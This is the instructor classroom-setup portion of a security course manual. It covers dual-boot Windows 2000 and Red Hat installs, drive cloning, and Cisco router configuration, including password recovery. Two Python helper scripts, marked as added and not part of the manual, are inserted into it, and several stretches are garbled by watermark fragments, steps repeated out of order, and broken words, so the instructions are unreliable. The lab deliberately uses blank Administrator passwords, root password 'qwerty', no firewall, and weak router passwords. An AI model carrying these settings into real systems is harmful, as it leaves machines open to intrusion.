File Unzippers | Windows, DOS/Free | Yes | www.winzip.com, www.pkware.com, or www.rarlab.com
PDF Viewer | Windows/Free | No | www.adobe.com/products/acrobat/readstep2.html
MS Office Viewers | Windows/Free | No | http://office.microsoft.com/downloads/default.aspx

For use in class, the instructor will need the following:

The CD-ROM included with the course manual.

A hardware keylogger.

A bootable DOS floppy disk, similar to the one used for class preparation.

Tools and utilities as described previously. These tools need to be downloaded from the Web, and can be burned onto a CD-ROM or copied onto the instructor's machine.

Note: During class, the instructor does not need to have, but should have access to, the disks used for class preparation.

For use in class, students will need the following:

The CD-ROM included with the course manual.

A bootable DOS floppy disk, similar to the one used for class preparation.

Tools and utilities as described previously. These tools need to be downloaded from the Web and can be burned onto a CD-ROM, placed in a shared folder on the classroom network, or copied onto the student machines.

Note: If you decide to create a Tools CD-ROM for use in class, make sure that the instructor collects the CD-ROMs from the students at the end of the course.

Class Requirements

In order for the class to run properly, perform the procedures described below.

Before you begin actually setting up the class, here are some recommendations for classroom configuration and hardware preparation.

Estimated minimum time for classroom setup (12 student machines and one instructor machine): 5 hours.

Recommendations for Hardware Preparation

The minimum hardware requirements are listed earlier in this course. It is not advisable to use anything less. It is recommended that all the computers be of the same or similar hardware configuration. If you do use computers with integrated motherboards and the video uses shared memory, we recommend you decrease the amount of shared memory to 2 MB so that you have as much RAM available for the OS as possible.

Configure the BIOS so that the boot order is 1: CD-ROM, 2: Floppy Drive, and 3: Hard Drive. Protect the student machine BIOSs with a password.

Classroom Configuration

Figure 0-1 shows the recommended classroom configuration. Use this figure in conjunction with the IP addressing and naming schemes described in the following section.

Figure 0-1: The recommended classroom configuration includes 12 student computers and 1 instructor computer.

IP Addressing and Computer Naming Scheme

Refer to the class layout diagram shown in Figure 0-1. The chart in Figure 0-2 shows the recommended IP addressing and computer-naming scheme. Use this pattern to develop addresses and names for additional machines as needed.

The routers divide the classroom into two halves, LEFT and RIGHT, with the CENTER router controlled by the instructor. The LEFT side is configured for subnet 172.16.0.0, the CENTER is on subnet 172.17.0.0 and the RIGHT side is on subnet 172.18.0.0. Students should be given the passwords for the LEFT and RIGHT routers but not for the CENTER router. In the chart, NIC 1 refers to the network card that is connected to the classroom hub, and NIC 2 refers to the network card that is connected to the partner machine (via a crossover cable).

Part of Classroom | Windows 2000 Computer Name | Linux Host Name | NIC 1 IP Address and Default Gateway | NIC 2 IP Address
LEFT | STU-W2K-L01 | stulnxl01 | IP: 172.16.10.1; DG: 172.16.0.1 | IP: 172.26.10.1
LEFT | STU-W2K-L02 | stulnxl02 | IP: 172.16.10.2; DG: 172.16.0.1 | IP: 172.26.10.2
LEFT | STU-W2K-L03 | stulnxl03 | IP: 172.16.10.3; DG: 172.16.0.1 | IP: 172.26.10.3
RIGHT | STU-W2K-R01 | stulnxr01 | IP: 172.18.10.1; DG: 172.18.0.1 | IP: 172.28.10.1
RIGHT | STU-W2K-R02 | stulnxr02 | IP: 172.18.10.2; DG: 172.18.0.1 | IP: 172.28.10.2
RIGHT | STU-W2K-R03 | stulnxr03 | IP: 172.18.10.3; DG: 172.18.0.1 | IP: 172.28.10.3
CENTER | INS-W2K-C01 | inslnxc01 | IP: 172.17.10.1; DG: 172.17.0.1 | N/A

Figure 0-2: Classroom configuration scheme.

IMPORTANT: Overview of the Partitioning Scheme for an 8 GB Hard Drive

Because you will be installing more than one OS on each machine, it's important to set up the proper disk partition sizes. Fortunately, because of the OSs involved, you can do most of this partitioning as part of the installation routines for each OS. See Figure 0-3 for a graphic rendition of the hard drive.

Estimated minimum time for partitioning and installing OSs on one machine: 3 hours.

Figure 0-3: A visual representation of the hard drive partitioning required for this course.

Another method to create a multi-boot machine is to install a host operating system such as Windows 2000 Professional, configure all the drivers, load VMware on top of the host OS, then install Windows 2000 Server and Red Hat Linux 8.0 as guest operating systems on top of the host OS. Note that this will require substantial hardware resources.
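The addressing scheme in Figure 0-2 can be checked mechanically before the drives are cloned, so that a student machine with a gateway on the wrong side of the classroom, or two machines sharing an address, is caught before class rather than during the first routing task. The following Python script is an added example and is not part of the course manual: it generates the LEFT, RIGHT and CENTER entries from the rules stated above (172.16.0.0 on the LEFT, 172.17.0.0 in the CENTER, 172.18.0.0 on the RIGHT; NIC 2 on 172.26.x and 172.28.x, absent on the instructor machine) and reports any host whose default gateway falls outside its own network or any address assigned twice. The SIDES table, the function names and the 255.255.0.0 mask applied to NIC 1 are this example's own assumptions; the manual names the subnets but does not state a mask.

```python
"""Classroom IP plan generator and consistency check.

Added example, not part of the course manual. The SIDES table, the
function names and the /16 mask are assumptions made for this example.
"""
import ipaddress

# Classroom rules taken from the course text: LEFT = 172.16.0.0, CENTER =
# 172.17.0.0, RIGHT = 172.18.0.0; NIC 2 (crossover link to the partner)
# uses 172.26.x on the LEFT and 172.28.x on the RIGHT, and the instructor
# machine in the CENTER has no NIC 2 address.
SIDES = {
    "LEFT":   {"win": "STU-W2K-L", "lnx": "stulnxl", "nic1": "172.16", "nic2": "172.26", "count": 3},
    "RIGHT":  {"win": "STU-W2K-R", "lnx": "stulnxr", "nic1": "172.18", "nic2": "172.28", "count": 3},
    "CENTER": {"win": "INS-W2K-C", "lnx": "inslnxc", "nic1": "172.17", "nic2": None, "count": 1},
}

# Assumed: the "subnet 172.16.0.0" wording in the manual is read as a /16.
NIC1_NETMASK = "255.255.0.0"


def build_plan():
    """Return one dict per machine: names, NIC 1 address, gateway, NIC 2 address."""
    plan = []
    for side, rule in SIDES.items():
        for n in range(1, rule["count"] + 1):
            plan.append({
                "side": side,
                "win_name": f"{rule['win']}{n:02d}",
                "linux_name": f"{rule['lnx']}{n:02d}",
                "nic1_ip": f"{rule['nic1']}.10.{n}",
                "gateway": f"{rule['nic1']}.0.1",
                "nic2_ip": f"{rule['nic2']}.10.{n}" if rule["nic2"] else None,
            })
    return plan


def check_plan(plan, netmask=NIC1_NETMASK):
    """Return a list of problem strings; an empty list means the plan is consistent.

    Two checks: the default gateway must lie inside the NIC 1 network, and no
    address may be used by more than one machine (NIC 1 and NIC 2 together).
    """
    problems = []
    seen = {}
    for m in plan:
        net = ipaddress.ip_network(f"{m['nic1_ip']}/{netmask}", strict=False)
        if ipaddress.ip_address(m["gateway"]) not in net:
            problems.append(f"{m['win_name']}: gateway {m['gateway']} is not in {net}")
        for ip in (m["nic1_ip"], m["nic2_ip"]):
            if ip is None:
                continue
            if ip in seen:
                problems.append(f"{m['win_name']}: {ip} is already used by {seen[ip]}")
            seen[ip] = m["win_name"]
    return problems


def format_plan(plan):
    """Render the plan as the same pipe-separated layout used in Figure 0-2."""
    lines = ["Part | Windows name | Linux name | NIC 1 (IP; DG) | NIC 2"]
    for m in plan:
        nic2 = f"IP: {m['nic2_ip']}" if m["nic2_ip"] else "N/A"
        lines.append(f"{m['side']} | {m['win_name']} | {m['linux_name']} | "
                     f"IP: {m['nic1_ip']}; DG: {m['gateway']} | {nic2}")
    return "\n".join(lines)


if __name__ == "__main__":
    plan = build_plan()
    print(format_plan(plan))
    # Constructed mistake: a RIGHT-side machine typed with the LEFT gateway.
    plan[3]["gateway"] = "172.16.0.1"
    for problem in check_plan(plan):
        print("PROBLEM:", problem)
```

Extending SIDES with a larger "count" produces the additional addresses the manual says to derive from the same pattern; the duplicate-address check is what catches a cloned drive whose TCP/IP settings were not changed after imaging.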
Installing and Configuring Windows 2000 Server

Estimated minimum time for Windows 2000 Server installation and configuration: 1 hour, 30 minutes.

1. Boot to DOS using a bootable DOS floppy disk (with utilities like delpart.exe, fdisk.exe, format.exe, mscdex.exe, and so forth).

2. Run delpart and fdisk /mbr to clean out the hard drive's partitions and Master Boot Record.

3. Insert the installation CD-ROM for Windows 2000 Server, and boot to it. The Windows 2000 Server Setup screen is displayed.

4. Press Enter to specify that you want to perform a new install. The Windows 2000 License Agreement is displayed.

5. Read the License Agreement, and then press F8 to accept the agreement.

6. When you are prompted for the location to use for setting up Windows, create a new partition of 2600 MB and specify this partition as the location for Windows 2000.

7. When you are prompted, specify that you do want the drive to be NTFS and press Enter. After the partition has been formatted and files copied, the computer will reboot.

8. At the Welcome To The Windows 2000 Server Setup Wizard screen, click Next. Setup next detects and installs device drivers.

9. For Regional Settings, select your local settings, and then click Next.

10. At the Personalize Your Software screen, use student for the Name, and SCP for the Organization. Click Next.

11. If prompted, enter the product key and click Next.

12. In the Licensing Modes screen, select Per Seat and click Next. If you choose Per Server, change the value to 99.

13. In the Computer Name and Administrator Password dialog box, leave the username as Administrator, and specify the Computer Name as XXXW2K-XXX. You will change the computer name on the cloned hard drives after the drives have been cloned. The student computers must use a blank password. (The Instructor machine can have a password, but the student computers cannot). Once the password has been defined or left blank, as appropriate, click Next.

14. If a modem is detected (some integrated motherboards have onboard modems, for example), enter the applicable area code and settings, and then click Next.

15. In the Windows 2000 Components screen, select IIS, click Details, check FTP, and click OK. Select Management And Monitoring Tools, click Details, check Network Monitor Tools, and click OK.

16. Click Next.

17. In the Date And Time Settings dialog box, enter the local settings and click Next.

18. For Network Settings, select Typical Settings and click Next.

19. If prompted, configure the TCP/IP settings to use DHCP for now. You will configure these settings on the cloned hard drives later.

20. Specify that the computer is to be part of a Workgroup called Workgroup.

21. Click Next to enable the computer to perform the final installation tasks. This will take several minutes.

22. When the Completing The Windows 2000 Setup Wizard is displayed, click Finish to complete the installation.

23. When the computer restarts, remove the installation CD-ROM, and log on to Windows 2000 as Administrator.

24. In the Configure Your Server dialog box, select I Will Configure This Server Later, and click Next. Uncheck Show This Screen At Startup, and then close the Windows 2000 Configure Your Server window.

25. Insert the Windows 2000 Server CD-ROM, and copy the i386 folder from the CD-ROM to the partition where you installed Windows 2000. Then, remove the CD-ROM.

26. Copy the file w2ksp2.exe to the partition where you installed Windows 2000, and double-click it to install Service Pack 2.

27. Accept all defaults for the Service Pack installation, and reboot when you are prompted to do so.

28. After the reboot, log on as Administrator, copy the file ie6setup.exe to the Windows 2000 boot partition, and run the program to upgrade to IE 6.

29. If the machines you plan to use in class have the same general hardware configuration, install any necessary drivers so that they will be copied to the cloned hard drives.

30. Open the Display Properties, select the Settings tab, and change the screen resolution to be at least 800 by 600 pixels.

31. Start Windows Explorer, select the C drive (or the drive letter that corresponds to the Windows 2000 boot partition), and choose View→Details. Choose View→Choose Columns, check Attributes, and click OK. Choose Tools→Folder Options. Under Web View, select Use Windows Classic Folders, and click Apply. In the Folder Options dialog box, select the View tab, check the first three check boxes, select Show Hidden Files And Folders, uncheck the next six check boxes, and click Apply. Then, click the Like Current Folder button, click Yes to close the Folder Views information box, and click OK to close the Folder Options dialog box.

32. Close Explorer.

33. Use the Start→Programs→Accessories menu to open a command prompt, right-click its title bar, and choose Properties. Select the Layout tab, uncheck Let System Position Window, and change the settings as shown in the following table.

Setting | Width | Height
Screen Buffer Size | 90 | 4000
Window Size | 90 | 42
Window Position | 48 | 0

Click OK, select Modify Shortcut That Started This Window, and click OK. Close the command prompt.

34. Use the Run dialog box to open a command prompt. Modify this command prompt's Layout properties similarly to the previous step. Click OK, select Save Properties For Future Windows With Same Title, and click OK. Then close the command prompt.

35. Right-click the Taskbar and choose Properties. Uncheck Use Personalized Menus and click OK.

36. If you are not supplying the Windows 2000 tools on a CD-ROM or shared folder, copy the Windows 2000 tools to the Windows 2000 boot partition.

37. Run the Sysprep utility. Do not boot to Windows 2000 again until after you have cloned or multicast the hard drives.

Estimated minimum time for Red Hat 8.0 Linux installation and conguration: 1 hour, 30 minutes.

ru ct
1. 2. 3. 4. 5.

36. If you are not supplying the Windows 2000 tools on a CD-ROM or shared folder, copy the Windows 2000 tools to the Windows 2000 boot partition. 37. Run the Sysprep utility. Do not boot to Windows 2000 again until after you have cloned or multicast the hard drives.

Installing and Configuring Red Hat 8.0 Linux


You can nd a complete installation manual at www.redhat.com/docs/manuals/ linux/RHL-8.0-Manual/install-guide. Insert the Red Hat Linux 8.0 Disc 1 into your CD-ROM drive and boot to it. An installation routine screen with several options is displayed. Press Enter to perform the install in GUI mode. If necessary, use the Tab key to select Skip, and press Enter to skip the test on the CD media. While the anaconda installer runs for a few minutes, please wait at this point. When you are presented with the Welcome GUI, click Next.

PL

35. Right-click the Taskbar and choose Properties. Uncheck Use Personalized Menus and click OK.

IC

AT

iti
4000 42 0

33. Use the StartProgramsAccessories menu to open a command prompt, right-click its title bar, and choose Properties. Select the Layout tab, uncheck Let System Position Window, and change the settings as shown in the following table. Height

on

6. 7. 8. 9.

Accept the default Language selection settings, and click Next. Accept the default Keyboard selection settings, and click Next. Verify that the default Mouse selection settings are accurate, and click Next. For the Installation Type, select Custom. Do not select Serverit will wipe out and take over your hard drive. Click Next.

10. Select Manually Partition With Fdisk and click Next. You can use Disk Druid if you prefer, but these instructions list only the steps for using fdisk.

13. Enter p to see the partition table. Primary partitions are numbered 1 through 4. One of these Primary partitions can be created as an Extended partition. Logical drives within the Extended partition are numbered from 5 onward. 14. Create an extended partition to hold the Linux logical partitions. To do this: a. b. c. d. e. f. Enter n to create a new partition.

Ed
T DU PL IC

12. Verify that the next screen has an explanation of the fdisk options for Linux in the left pane. The commands can be entered in the right pane.

Enter e to specify that you want to create an Extended partition. Enter 2 to specify the Partition Number. For the rst cylinder, press Enter. Enter 1023 to specify the last cylinder.

Enter p to display the partition table again.

15. Create a logical drive of 100 MB for the /boot partition. To do this: a. b. c. d. e. Enter n to create a new partition.

If prompted, specify the partition number as the next available; this should be 5. For the last cylinder enter +100M to create a logical drive of 100 MB.

16. Create a swap space of 256 MB. To do this:

In

a.

Enter n to specify that you want to create a new partition. Enter l to specify that you want to create a logical drive partition. If prompted, specify the partition number as the next available; this should be 6. For the rst cylinder, press Enter. For the last cylinder enter +256M to create a logical drive of 256 MB.
About This Course xxxv

b. c.

d. e.

DO

For the rst cylinder, press Enter.

st

NO

Enter l to specify that you want to create a logical drive partition.

ru ct

or

AT

iti

11. Click the button for your hard drive. If you have only one IDE hard drive thats set to Master, you will see the button labeled as hda. Watch out with this optionmake sure youre creating the install on a machine that is representative of your classroom.

on

17. Create a logical drive for the rest of the space (approximately 5+ GB). To do this:
    a. Enter n to specify that you want to create a new partition.
    b. Enter l to specify that you want to create a logical drive partition.
    c. If prompted, specify the partition number as the next available; this should be 7.
    d. For the first cylinder, press Enter.
    e. For the last cylinder press Enter again to allocate all remaining space in the extended partition for this logical drive.

18. Enter p to see the updated partition table. Verify that the three logical drives, named hda5, hda6, and hda7, are displayed, and that the partition type (in Hex code) is Type 83 for the three logical drives you just created.

19. Make the 256 MB partition (logical drive 6) a swap partition. To do this:
    a. Enter t to specify that you want to change a partition's type.
    b. For the partition number, specify the number for this partition (it should be 6).
    c. For Hex code, enter 82 to assign this partition to be the swap space.

20. Verify that you have the right partition types by viewing the partition table before you write to it (enter p to view). /tmp/hda6 should be listed as Linux Swap.

21. Enter w to commit to this partition table. When you are returned to the Partitioning With Fdisk screen, click Next.

22. If you see a popup informing you that a partition type 82h has to be formatted as a Linux swap partition, and asking if you would like to do so, click Yes.

23. Double-click the 100 MB partition, and assign it to the /boot mount point. To do this:
    a. Select the Format Partition As ext3 radio button.
    b. Click the drop-down button for Mount Point.
    c. Select /boot and click OK.

24. Double-click the 5+ GB partition, and assign it to the / mount point. To do this:
    a. Select the Format Partition As ext3 radio button.
    b. Click the drop-down button for Mount Point.
    c. Select / and click OK.

25. Click Next. If you see a popup titled Format Warnings, click Format.

26. In the Boot Loader configuration screen, accept the default boot loader GRUB.
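Steps 18 and 20 have you check the partition table by eye before the w command writes it. The following Python check is an added example and is not part of this instructor guide: it parses the table that fdisk prints (the output of p, or of fdisk -l) and verifies that the extended partition and the three logical drives exist with the expected Ids (5 = Extended, 83 = Linux, 82 = Linux swap) and minimum sizes. The sample table, the device names in it and the size thresholds are constructed for the demo to match the plan above (hda1 Windows, hda2 extended, hda5 /boot, hda6 swap, hda7 /).

```python
"""Verify a partition table against the layout built in steps 13 through 19.

Added example, not part of the instructor guide.  It parses the table that
fdisk prints (the output of 'p' or 'fdisk -l') and checks that the extended
partition and the three logical drives exist with the expected system Ids
(5 = Extended, 83 = Linux, 82 = Linux swap) and minimum sizes.  The sample
table below is constructed for this demo; run the real check by feeding the
installer's own fdisk output to check_layout(parse_table(...)).
"""
import re

# Constructed sample in the shape fdisk prints.  Blocks are 1 KiB units.
SAMPLE_TABLE = """\
   Device Boot    Start       End    Blocks   Id  System
/dev/hda1   *         1       331   2658726    7  HPFS/NTFS
/dev/hda2           332      1023   5558490    5  Extended
/dev/hda5           332       344    104391   83  Linux
/dev/hda6           345       377    265041   82  Linux swap
/dev/hda7           378      1023   5188963   83  Linux
"""

# Partition number -> (expected Id, minimum size in MB); None = no size check.
# Mirrors the plan: hda2 extended, hda5 /boot 100 MB, hda6 swap 256 MB, hda7 / 5+ GB.
EXPECTED = {2: ("5", None), 5: ("83", 100), 6: ("82", 256), 7: ("83", 5000)}


def parse_table(text):
    """Return {partition_number: dict(device, start, end, size_mb, id, system)}."""
    parts = {}
    for line in text.splitlines():
        fields = line.split()
        if not fields or not fields[0].startswith("/"):
            continue                      # header line or blank
        if fields[1] == "*":              # bootable flag column is optional
            fields.pop(1)
        dev, start, end, blocks, sysid = fields[:5]
        num = int(re.search(r"(\d+)$", dev).group(1))
        parts[num] = {
            "device": dev,
            "start": int(start),
            "end": int(end),
            "size_mb": int(blocks.rstrip("+")) / 1024,   # fdisk marks partial blocks with '+'
            "id": sysid.lower(),
            "system": " ".join(fields[5:]),
        }
    return parts


def check_layout(parts, expected=EXPECTED):
    """Return a list of problems; an empty list means the table matches the plan."""
    problems = []
    for num, (want_id, min_mb) in expected.items():
        p = parts.get(num)
        if p is None:
            problems.append(f"partition {num} missing")
            continue
        if p["id"] != want_id:
            problems.append(f"partition {num} has Id {p['id']}, expected {want_id}")
        if min_mb is not None and p["size_mb"] < min_mb:
            problems.append(f"partition {num} is {p['size_mb']:.0f} MB, expected at least {min_mb} MB")
    # Logical drives (5 and up) must lie within the extended partition's cylinders.
    ext = parts.get(2)
    if ext is not None:
        for num, p in parts.items():
            if num >= 5 and not (ext["start"] <= p["start"] and p["end"] <= ext["end"]):
                problems.append(f"partition {num} lies outside the extended partition")
    return problems


if __name__ == "__main__":
    table = parse_table(SAMPLE_TABLE)
    for num in sorted(table):
        p = table[num]
        print(f"{p['device']:<10} {p['size_mb']:8.1f} MB  Id {p['id']:>2}  {p['system']}")
    issues = check_layout(table)
    print("OK: layout matches the plan" if not issues else "\n".join(issues))
    # What step 19 fixes: a swap drive still typed 83 is flagged before you enter w.
    print(check_layout(parse_table(SAMPLE_TABLE.replace("82  Linux swap", "83  Linux"))))
```

The second print shows the case step 19 exists for: if the 256 MB drive is still Type 83, the check names it before anything is written, which is cheaper than finding out at step 22 or at first boot.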

27. Change the label for the dos partition and make it the default boot drive, by selecting it and clicking Edit, changing the label to read Windows 2000, checking Default Boot Target, and clicking OK. (This is what you will see later in the startup screen.) Click Next.

28. Specify that you do not wish to activate the network interface(s) at boot. When you image this hard drive and boot to Linux, each machine will take a long time to discover that there are no DHCP servers around.

29. Manually set the hostname to xxxlnxxxx (no hyphens or spaces).

30. Leave the miscellaneous settings alone for now, and click Next. You can configure these settings after imaging the hard drives. Click Continue to clear any warning messages you might receive.

31. For Security Level, select No Firewall, and click Next.

32. Accept the default language selection, and click Next.

33. Select the appropriate Time Zone and Daylight Savings Time, where applicable. Click Next.

34. Specify the password for the built-in Root account to be qwerty and click Next. You do not have to create any more accounts at this stage.

35. Accept the defaults for Authentication Configuration, and click Next.

36. When selecting Package Groups, scroll down and select Everything, and then click Next to do a complete install of all packages.

37. At the About To Install screen, click Next, and wait for the install to go through its steps. Depending upon the CPU, this could take anywhere from 45 to 90 minutes. Change disks when prompted (you will need to use all three disks).

38. For the very first time you do this install, create a boot disk, as you have no way of knowing at this point whether you can successfully boot from the hard drive or not. After you are done creating the boot disk, you will be prompted for the X configuration.

39. For the video card selection, browse the choices and select the option that matches the video card installed in the computer. Sometimes there are problems here, even if the exact model is found. The way to get around this is to choose Generic SVGA, but only as a last resort. Click Next.

40. When the monitor is probed, you may or may not see the right one. Accept the defaults here.

41. Specify a resolution of 800x600x16-bit color. Most mid-range projectors do not handle higher resolutions. Do not click the Test button, as it might cause the installation to go into a loop, forcing you to have to abort the install.

42. Select the login type to be Text, and click Next. This will at least help you to get started if you have any problems with the GUI.

43. Click Exit.

44. As the machine reboots, remove the floppy disk. The CD-ROM will be ejected automatically; remove it and close the CD drawer.

45. When the GRUB loader is displayed, choose Red Hat Linux to test the installation.

46. At the login prompt, enter the username root and password qwerty to verify that you can log in.

47. Enter startx to test the GUI.

48. After you have verified the Linux installation, change the default login type to be GUI. To do this, you will need to edit the file /etc/inittab to change the line id:3:initdefault: to read id:5:initdefault:, and reboot the computer.

49. At the welcome screen, click Forward.

50. If necessary, verify the date and time, and click Forward.

51. If any hardware, such as the sound card, is detected, either test it or ignore it for now. Click Forward.

52. If you are prompted to register, click No, I Do Not Want To Register and click Forward.

53. If additional software options are presented, ignore them. Click Forward twice.

54. Log in as root again to test the GUI login.

55. If you are not supplying the Linux tools on a CD-ROM or shared folder, copy the Linux tools to the hard drive.

56. Shut down the system.

Cloning the Hard Drives

Now that the installation of the operating systems is completed on one computer, the hard drive is ready to be cloned for use with all of the student computers, as well as the instructor computer. Please look after this disk well (we'll refer to it as the source hard drive), as it will serve you for many class preparations. The only thing to watch out for, if you have used evaluation versions, is the 120-day time limit on the Windows 2000 operating system.

Norton's Ghost is a good product for cloning. If you opt not to use Sysprep, you will also need to use a SID-changer to change the SIDs for the Windows 2000 Server install. Norton's Ghostwalk is a good product for changing SIDs. You can also download a free SID changer from www.sysinternals.com/ntw2k/source/newsid.shtml. As for Linux, sometimes Linux will not boot off a cloned hard drive. If you come across such problems, perform an install and choose the upgrade option. This takes about 10 minutes (as opposed to a 45-minute full install).

Every computer with the cloned hard drive must be manually reconfigured. You will have to keep track of variables such as computer names, host names, and TCP/IP configuration parameters. Cloning and configuration takes approximately 30 minutes per computer.

1. Insert the master (source) hard drive into the Primary Master removable bay in your cloning machine.

2. Insert the blank (destination) hard drive into the Secondary Master removable bay in your cloning machine.

3. Boot using a bootable floppy disk, and run the cloning program. We recommend Norton's Ghost utility.

4. Specify the source and destination drives.

5. IMPORTANT: Do not accept the partition sizes on the destination drive; you must match the source drive's partition sizes; that is, 2600 MB Primary, 100 MB (Linux /boot logical drive), 256 MB (Linux Swap logical drive), and 5+ GB (Linux / logical drive).

6. When done selecting, click Continue and wait for the cloning process to complete.

Estimated minimum time for cloning: 10 minutes per hard drive. If you can image the source hard drive to a file server and multicast this image over the network to all the student machines, estimated minimum time: 5 minutes per hard drive.

After Cloning the Hard Drives

Estimated minimum time for manual reconfiguration of cloned hard drives: 10 minutes per workstation, but if you can work in parallel (such as downloading the OS images over a network), you should be able to set up 12 computers with the appropriate configuration in under 4 hours.

Perform the following steps for each cloned hard drive.

1. Insert the cloned hard drive into one of the student machines or the instructor machine.

2. Boot to Windows 2000 Server. Because you ran the Sysprep utility before cloning the hard drive, it should now run a short setup routine.
    a. When you are prompted for a new computer name, enter a name as described in Figure 0-2. This will also create a new SID for each machine.
    b. Open the Network And Dial-up Connections Control Panel, right-click Local Area Connection 1, and display its properties. Check Show Icon In Taskbar When Connected, and click OK. Determine what this interface is connected to, and then rename the connection Classroom Hub or Partner, accordingly.
    c. In the Network And Dial-up Connections Control Panel, right-click Local Area Connection 2, and display its properties. Check Show Icon In Taskbar When Connected, and click OK. Determine what this interface is connected to, and then rename the connection Classroom Hub or Partner, accordingly.
    d. Change the IP addresses and default gateway as described in Figure 0-2.

3. Boot to Linux. Change the host name and IP addresses as described in Figure 0-2.
    a. If the machine hangs on GRUB, insert the Linux boot CD-ROM, reboot the machine, and upgrade your install. This should take only a few minutes.
    b. If you need to change the monitor resolution in Linux, run the X configurator. You can access Xconf by running setup from a terminal.

4. Shut down the computer.

Configuring Cisco Routers

Estimated minimum time for router setup: 1 hour.

Three Cisco routers are used in the class. The 2501 series is preferred, with a minimum IOS version of 12.2 (with IPSec/SSH support).

The decision whether to allow or not allow the classroom machines to use the Internet is up to the Internet access policies of your location. You can configure NAT on the Instructor Machine to allow the class members to use the Internet. The default route configuration provided here assumes that you will have the Instructor Machine perform NAT. Alternatively, the CENTER router, the Instructor Machine and another device with NAT capabilities can all be connected to a hub. Whichever method you choose, just enter the appropriate configuration statement on the CENTER router.

The following shows an overview of the configuration requirements of each router. They are to run IP with access lists configured and RIP as the routing protocol. Configuration beyond what is shown here is not required. Students will be asked to connect to the routers, so it is advised that the CENTER router the instructor uses have a different and more complex Enable Password. Students should be allowed to Telnet to all three routers.

The LEFT router is for one half of the class to connect through. It should have the following configuration:

    Hostname and Routername: LEFT
    Access List Configuration:
        Access-list 123 deny tcp any any eq 25
        Access-list 123 permit ip any any
        INT S0: ip access-group 123 in

The CENTER router is for the Instructor to connect to the class. It should have the following configuration:

    Hostname and Routername: CENTER
    Access List Configuration:
        Access-list 155 deny tcp any any eq 20
        Access-list 155 deny tcp any any eq 21
        Access-list 155 permit ip any any
        INT S0: ip access-group 155 in
        INT S1: ip access-group 155 in

The RIGHT router is for the other half of the class to connect through. It should have the following configuration:

    Hostname and Routername: RIGHT
    Access List Configuration:
        Access-list 145 deny tcp any any eq 25
        Access-list 145 permit ip any any
        INT S1: ip access-group 145 in

The detailed configuration procedures are listed here in three main categories:
    Physical configuration
    Router setup
    Access list configuration

Physical Router Configuration

The LEFT router is to be connected to the CENTER router via a Cisco serial cable. The RIGHT router is also to be connected to the CENTER router via a Cisco serial cable. All Ethernet connections are to be made through standard 10/100 BaseT cables.

1. Study the class setup diagram provided in Figure 0-1.

2. Physically connect the three routers to each other, using serial crossover cables, so that the router designated as CENTER controls the clock rate. To do this, connect the DCE end of the serial cable to the serial interfaces on the CENTER router and the DTE ends to the LEFT and RIGHT routers' appropriate serial interfaces.

3. Connect the Ethernet interface on the CENTER router to the instructor machine via a crossover Ethernet cable.

4. Connect the Ethernet interfaces on the LEFT and RIGHT routers to their respective hubs serving their side of the classroom.

Before You Start the Router Setup

All routers should be cleared of any configs before setting up the class. If you have a configured router but you don't know the password, perform the following steps:

1. Console into the router.

2. Enter the sh ver command, and record the configuration register setting (usually 0x2102).

3. Power down the router, and then power it back up.

4. After the amount of main memory is displayed, press the Break key (or Ctrl+Break). You should see the > prompt with no router name.

5. Enter o/r 0x42 to boot from flash or o/r 0x41 to boot from ROM. Typically, you would boot from flash if it were intact.

6. Enter i to force the router to reboot and ignore its saved config.

7. Answer no to all setup questions.

8. When the Router> prompt is displayed, enter enable to switch to enable mode. The Router# prompt should now be displayed. Once you are in enable mode, you can view and change the password, and you can erase the config.

9. To view the password, enter show config at the Router# prompt.

10. To change the password, from the Router# prompt:
    a. Enter config mem to copy NVRAM to mem.
    b. Enter wr term.
    c. Enter config term to enter config mode. The Router(config)# prompt is now displayed.
    d. If an enable secret password is set, enter enable secret newpassword, or if there is no enable secret password, enter enable password newpassword, where newpassword is the new password you want to use.
    e. Press Ctrl+Z to exit config mode. The Router# prompt is now displayed.
    f. Enter write mem to save the changes to NVRAM. You should now be able to console in and configure the router.

11. To erase the config, from the Router# prompt:
    a. Enter write erase.
    b. Enter config term to enter config mode. The Router(config)# prompt is now displayed.
    c. Enter config-register 0x2102 or whatever the configuration register setting was when you began.
    d. Press Ctrl+Z to exit config mode. The Router# prompt is now displayed.
    e. Enter reload.
    f. When you are prompted to save the modified system configuration, enter y.
    g. When you are prompted to proceed with the reload, enter y.

Setup for CENTER Router

The CENTER router is used by the instructor to connect to the rest of the class. To set up the CENTER router:

1. Boot up the router and console into it. You should be prompted to enter the initial configuration dialog. (If you are not, follow the procedures listed previously in the Before You Start the Router Setup section.)

2. When you are prompted:
    a. To enter the initial configuration dialog, enter y.
    b. To enter basic management setup, enter n.
    c. As to whether you want to see the current interface summary, press Enter.

    d. To enter the host name for [Router], enter CENTER.
    e. To enter the enable secret password, enter instructor.
    f. To enter the enable password, enter cisco1.
    g. To enter the virtual terminal password, enter 2501.
    h. To configure SNMP network management, enter n.
    i. To configure LAT, enter n.
    j. To configure bridging, press Enter to accept the default of No.
    k. To configure AppleTalk, press Enter to accept the default of No.
    l. To configure DECnet, press Enter to accept the default of No.
    m. To configure IP, press Enter to accept the default of Yes.
    n. To configure IGRP routing, enter n.
    o. To configure RIP routing, enter y.
    p. To configure CLNS, press Enter to accept the default of No.
    q. To configure IPX, press Enter to accept the default of No.
    r. To configure Vines, press Enter to accept the default of No.
    s. To configure XNS, press Enter to accept the default of No.
    t. To configure Apollo, press Enter to accept the default of No.
    u. If you are prompted to configure BRI, select switch type 0.
    v. To configure the Ethernet0 interface, press Enter to accept the default of Yes.
    w. To configure IP on this interface, press Enter to accept the default of Yes.
    x. For the IP address for this interface, enter 172.17.0.1.
    y. For the subnet mask for this interface, press Enter to accept the default of 255.255.0.0.
    z. To configure the Serial0 interface, press Enter to accept the default of Yes.
    aa. To configure IP on this interface, press Enter to accept the default of Yes.
    ab. To configure IP unnumbered on this interface, press Enter to accept the default of No.
    ac. For the IP address for this interface, enter 192.168.20.2.
    ad. For the subnet mask for this interface, press Enter to accept the default of 255.255.255.0.
    ae. To configure the Serial1 interface, press Enter to accept the default of Yes.
    af. To configure IP on this interface, press Enter to accept the default of Yes.
    ag. To configure IP unnumbered on this interface, press Enter to accept the default of No.
    ah. For the IP address for this interface, enter 192.168.10.2.
    ai. For the subnet mask for this interface, press Enter to accept the default of 255.255.255.0.

    aj. If you are prompted to configure any other serial interfaces, enter n until a configuration command script is generated, and you are prompted to make a selection regarding the next action.
    ak. To enter your selection, press Enter to accept the default of 2. You should see a message indicating that the router is building the configuration. When the configuration build is complete, an OK message is displayed.
